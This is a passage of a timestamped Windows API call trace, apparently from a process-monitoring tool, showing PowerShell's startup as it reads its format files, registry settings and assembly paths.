	[0054.947] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.947] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.948] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.948] GetLastError () returned 0x0
	[0054.948] SetErrorMode (uMode=0x1) returned 0x1
	[0054.948] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.948] GetLastError () returned 0x0
	[0054.948] GetFileType (hFile=0x2fc) returned 0x1
	[0054.948] SetErrorMode (uMode=0x1) returned 0x1
	[0054.948] GetFileType (hFile=0x2fc) returned 0x1
	[0054.948] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x8b4, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x2359800, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2359800*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.950] ReadFile (in: hFile=0x2fc, lpBuffer=0x235a3ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x235a3ac*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.950] GetLastError () returned 0x0
	[0054.951] CloseHandle (hObject=0x2fc) returned 1
	[0054.951] GetLastError () returned 0x0
	[0054.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.951] GetLastError () returned 0x0
	[0054.951] SetErrorMode (uMode=0x1) returned 0x1
	[0054.951] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x237b3a8 | out: lpFileInformation=0x237b3a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0054.951] GetLastError () returned 0x0
	[0054.951] SetErrorMode (uMode=0x1) returned 0x1
	[0054.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.951] GetLastError () returned 0x0
	[0054.951] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.951] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.951] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.952] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.952] GetLastError () returned 0x0
	[0054.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0054.952] GetLastError () returned 0x0
	[0054.952] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3fca6296, Data2=0x34c9, Data3=0x4f58, Data4=([0]=0xb7, [1]=0xda, [2]=0xd5, [3]=0x27, [4]=0x51, [5]=0x82, [6]=0xef, [7]=0x23))) returned 0x0
	[0054.952] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x9c345ce4, Data2=0xe76f, Data3=0x48b6, Data4=([0]=0x9b, [1]=0x7d, [2]=0xd1, [3]=0x79, [4]=0x12, [5]=0xca, [6]=0x96, [7]=0x58))) returned 0x0
	[0054.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.952] GetLastError () returned 0x0
	[0054.952] SetErrorMode (uMode=0x1) returned 0x1
	[0054.952] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.953] GetLastError () returned 0x0
	[0054.953] GetFileType (hFile=0x2fc) returned 0x1
	[0054.953] SetErrorMode (uMode=0x1) returned 0x1
	[0054.953] GetFileType (hFile=0x2fc) returned 0x1
	[0054.953] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.954] GetLastError () returned 0x0
	[0054.954] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.954] GetLastError () returned 0x0
	[0054.954] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.954] GetLastError () returned 0x0
	[0054.955] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0xe98, lpOverlapped=0x0) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] ReadFile (in: hFile=0x2fc, lpBuffer=0x23908f0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23908f0*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] ReadFile (in: hFile=0x2fc, lpBuffer=0x23912b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23912b8*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] CloseHandle (hObject=0x2fc) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.955] GetLastError () returned 0x0
	[0054.955] SetErrorMode (uMode=0x1) returned 0x1
	[0054.955] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23b22b4 | out: lpFileInformation=0x23b22b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0054.955] GetLastError () returned 0x0
	[0054.955] SetErrorMode (uMode=0x1) returned 0x1
	[0054.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.956] GetLastError () returned 0x0
	[0054.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.956] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.956] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.956] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.956] GetLastError () returned 0x0
	[0054.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0054.956] GetLastError () returned 0x0
	[0054.956] VirtualQuery (in: lpAddress=0x22cf70, lpBuffer=0x22df70, dwLength=0x1c | out: lpBuffer=0x22df70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.957] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x6795cd9e, Data2=0x4edf, Data3=0x45bb, Data4=([0]=0x81, [1]=0xd5, [2]=0xa7, [3]=0x23, [4]=0xc4, [5]=0x77, [6]=0xd1, [7]=0x25))) returned 0x0
	[0054.957] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x5710163, Data2=0x3a41, Data3=0x4aeb, Data4=([0]=0x83, [1]=0x99, [2]=0x96, [3]=0xb8, [4]=0xa0, [5]=0xd2, [6]=0x27, [7]=0x7e))) returned 0x0
	[0054.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0054.981] GetLastError () returned 0x57
	[0054.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0054.982] GetLastError () returned 0x57
	[0054.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0054.991] GetLastError () returned 0x57
	[0054.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0054.991] GetLastError () returned 0x57
	[0055.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.000] GetLastError () returned 0x57
	[0055.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.000] GetLastError () returned 0x57
	[0055.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0055.013] GetLastError () returned 0x57
	[0055.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0055.013] GetLastError () returned 0x57
	[0055.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0055.020] GetLastError () returned 0x57
	[0055.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0055.020] GetLastError () returned 0x57
	[0055.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0055.033] GetLastError () returned 0x57
	[0055.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0055.033] GetLastError () returned 0x57
	[0055.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.043] GetLastError () returned 0x57
	[0055.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.044] GetLastError () returned 0x57
	[0055.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.064] GetLastError () returned 0xcb
	[0055.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.066] GetLastError () returned 0xcb
	[0055.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.067] GetLastError () returned 0xcb
	[0055.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.068] GetLastError () returned 0xcb
	[0055.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.071] GetLastError () returned 0xcb
	[0055.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.072] GetLastError () returned 0xcb
	[0055.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.073] GetLastError () returned 0xcb
	[0055.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e30c | out: phkResult=0x22e30c*=0x2fc) returned 0x0
	[0055.076] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e35c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e360, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e35c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e360*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.077] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x3c3520, lpcchValueName=0x22e384, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22e384, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0055.077] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x3c3520, lpcchValueName=0x22e384, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22e384, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0055.077] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x3c3520, lpcchValueName=0x22e384, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22e384, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0055.077] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22e364, lpData=0x0, lpcbData=0x22e360*=0x0 | out: lpType=0x22e364*=0x1, lpData=0x0, lpcbData=0x22e360*=0x8) returned 0x0
	[0055.077] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22e364, lpData=0x3c3520, lpcbData=0x22e360*=0x8 | out: lpType=0x22e364*=0x1, lpData="2.0", lpcbData=0x22e360*=0x8) returned 0x0
	[0055.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e2c8 | out: phkResult=0x22e2c8*=0x32c) returned 0x0
	[0055.217] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22e318, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e31c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22e318*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22e31c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0055.218] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x3c3520, lpcchValueName=0x22e340, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22e340, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0055.218] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x3c3520, lpcchValueName=0x22e340, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22e340, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0055.218] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x3c3520, lpcchValueName=0x22e340, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22e340, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
